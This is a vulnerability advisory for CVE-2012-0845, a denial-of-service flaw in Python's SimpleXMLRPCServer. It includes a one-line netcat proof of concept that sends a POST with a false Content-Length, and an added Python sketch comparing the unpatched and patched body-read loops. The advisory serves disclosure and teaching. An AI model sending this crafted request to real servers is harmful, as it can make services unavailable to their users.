Python SimpleXMLRPCServer Denial Of Service Vulnerability

http://www.securityfocus.com/bid/51996

Security Info

Bugtraq ID: 51996
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2012-0845
Remote: Yes
Local: No
Published: Feb 14 2012 12:00AM
Updated: May 02 2012 05:01PM
Credit: Dan Callaghan
Vulnerable: Red Hat Fedora 17
Python Software Foundation Python 3.2.2
Python Software Foundation Python 2.7.2
Not Vulnerable:

Security Discussion

Python is prone to a denial-of-service vulnerability.

An attacker can exploit this issue by sending a specially crafted HTTP POST request.

Successful exploits will allow attackers to cause a denial-of-service condition.

Python versions 2.7.2 and 3.2.2 are vulnerable; other versions may also be affected.

Proof of Concept and Security Exploits

An attacker can use readily available tools to exploit this issue.

The following exploit is available:

$ echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345

Security Solution(s)

Solution:
Updates are available. Please see the references for more information.
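
The request shown above declares Content-Length: 100 but sends fewer bytes and then closes the connection; in the affected versions the handler's body-read loop did not stop at end-of-stream. The following is an added example, not code from this advisory or from the Python source: a simplified model of that loop beside a version with the end-of-stream check, with hypothetical function names and a constructed in-memory request body.

```python
import io

MAX_CHUNK = 10 * 1024 * 1024  # per-read cap used by this sketch


def read_body_unpatched(rfile, content_length, max_iterations=1000):
    """Model of a read loop with no end-of-stream check.

    max_iterations exists only in this demo so the spin can be observed
    and stopped; the modelled loop has no such cap.
    Returns (body, iterations, terminated_normally).
    """
    remaining = content_length
    chunks = []
    iterations = 0
    while remaining:
        if iterations >= max_iterations:
            return b"".join(chunks), iterations, False
        chunk = rfile.read(min(remaining, MAX_CHUNK))
        chunks.append(chunk)
        remaining -= len(chunk)  # at EOF read() gives b"", so no progress
        iterations += 1
    return b"".join(chunks), iterations, True


def read_body_patched(rfile, content_length):
    """Same loop, but an empty read (peer closed early) ends it.

    Returns (body, iterations, body_complete).
    """
    remaining = content_length
    chunks = []
    iterations = 0
    while remaining:
        chunk = rfile.read(min(remaining, MAX_CHUNK))
        iterations += 1
        if not chunk:  # end-of-stream before Content-Length was satisfied
            break
        chunks.append(chunk)
        remaining -= len(chunk)
    body = b"".join(chunks)
    return body, iterations, len(body) == content_length


if __name__ == "__main__":
    short_body = b"lol bye\n"  # constructed: 8 bytes sent, 100 declared
    print(read_body_unpatched(io.BytesIO(short_body), 100)[1:])
    print(read_body_patched(io.BytesIO(short_body), 100)[1:])
```

A handler using the patched form should treat a False `body_complete` as a truncated request and reject it rather than parse the partial body.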

Security Reference(s)

References:
